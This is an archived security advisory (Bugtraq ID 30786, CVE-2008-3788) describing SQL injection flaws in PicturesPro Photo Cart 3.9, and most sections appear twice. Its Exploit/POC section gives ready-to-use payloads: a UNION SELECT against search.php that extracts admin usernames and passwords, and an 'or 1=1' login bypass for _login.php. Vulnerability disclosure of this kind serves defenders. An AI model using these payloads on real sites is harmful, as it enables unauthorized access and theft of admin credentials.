PicturesPro Photo Cart Multiple SQL Injection Vulnerabilities
BID:30786
Info
PicturesPro Photo Cart Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 30786 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3788 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 21 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | ~!Dok_tOR!~ |
| Vulnerable: |
PICTURESPRO Photo Cart 3.9 |
| Not Vulnerable: | |
Discussion
PicturesPro Photo Cart Multiple SQL Injection Vulnerabilities
PicturesPro Photo Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Photo Cart 3.9 is vulnerable; other versions may also be affected.
PicturesPro Photo Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Photo Cart 3.9 is vulnerable; other versions may also be affected.
Exploit / POC
PicturesPro Photo Cart Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit this issue.
The following example script parameters are available:
For the 'search.php' script: ' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/*
For the '_login.php' script:
Email Address: 1' or 1=1/*
Password: 1' or 1=1/*
Attackers can use a browser to exploit this issue.
The following example script parameters are available:
For the 'search.php' script: ' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/*
For the '_login.php' script:
Email Address: 1' or 1=1/*
Password: 1' or 1=1/*
Solution / Fix
PicturesPro Photo Cart Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PicturesPro Photo Cart Multiple SQL Injection Vulnerabilities
References:
References:
- Vendor Homepage (PICTURESPRO)